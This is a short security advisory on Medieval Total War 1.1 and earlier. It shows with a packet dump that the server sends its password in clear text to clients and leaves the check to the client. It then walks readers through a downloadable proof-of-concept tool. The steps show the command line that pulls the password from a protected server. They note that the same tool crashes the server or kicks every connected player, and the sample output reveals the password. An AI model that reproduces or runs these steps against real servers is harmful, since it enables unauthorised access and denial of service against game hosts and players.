###################################################################### Does really exist the password protection in Medieval Total War? by Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ###################################################################### The password protection in Medieval Total War (version <= 1.1) is incredibly stupid. Practically the password is NOT checked by the server as ALL the normal programs in the world do, but IS checked by the same client! Q: But how the client knows if the password is right??? A: Check the following dump of a MTW packet sent by the server: 49 00 00 00 0e cc e3 00 01 88 81 01 00 00 50 80 I....¦Ò..êü...P 00 00 00 00 00 00 00 00 05 01 00 39 ed cc 08 a7 ...........9ݦ. 08 a7 00 1d 02 79 bb 1b c2 00 68 00 69 00 6c 00 .º...y+.-.h.i.l. 6c 00 79 00 69 00 6e 00 6c 00 61 00 6e 00 64 00 l.y.i.n.l.a.n.d. 31 00 33 00 00 00 73 00 65 00 72 00 76 00 65 00 1.3...s.e.r.v.e. 72 00 6e 00 61 00 6d 00 65 00 00 00 6d 00 79 00 r.n.a.m.e...m.y. 73 00 65 00 63 00 72 00 65 00 74 00 70 00 61 00 s.e.c.r.e.t.p.a. 73 00 73 00 77 00 6f 00 72 00 64 00 00 00 63 00 s.s.w.o.r.d...c. 61 00 6d 00 70 00 6d 00 61 00 70 00 5c 00 73 00 a.m.p.m.a.p.\.s. 74 00 61 00 72 00 74 00 70 00 6f 00 73 00 5c 00 t.a.r.t.p.o.s.\. 4c 00 61 00 74 00 65 00 2e 00 74 00 78 00 74 00 L.a.t.e...t.x.t. 00 00 00 fe 1f 00 00 00 00 00 00 00 00 ff ff ff ..._......... 00 73 00 65 00 72 00 76 00 65 00 72 00 6e 00 61 .s.e.r.v.e.r.n.a 00 6d 00 65 00 00 .m.e.. By this dump we can see some strings in plain text (unicode chars): hillyinland13: the map to use servername: the name of the server mysecretpassword: just the server's password 8-) campmap\startpos\Late.txt: type of campaign So as you can see the password is sent in plain text to the client that simply asks to the user to insert the same password. The check is done completely by the client NOT by the server. If you wanna join in a MTW server protected by password, follow these instructions: 1) Get my mtwdos-server proof-of-concept from: http://aluigi.org/poc/mtwdos-server.zip 2) Now from your console write the following command: mtwdos-server 1 SERVER where 1 is the amout of chars of your nickname (DON'T use 0 or a number major than 75 or the server will crash!) and SERVER is the IP or the name of the server protected by password 3) You will receive an output like the following: C:\>mtwdos-server 1 p400 Medieval Total War <= 1.1 broadcast kick and crash 0.1 by Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org All the clients connected to the server and the same server in the Lobby screen will be kicked or crashed immediately Getting the challenge key of the remote server... Admin name: nomedistocazzo Map name: hillyinland13 Server name: servername Password: mysecretpassword Campaign: campmap\startpos\Late.txt Challenge key: 16835532 Malicious login informations successfully sent 4) The fourth information contains just the server's password: Password: mysecretpassword 5) Now you have the password, join the match and happy game 8-)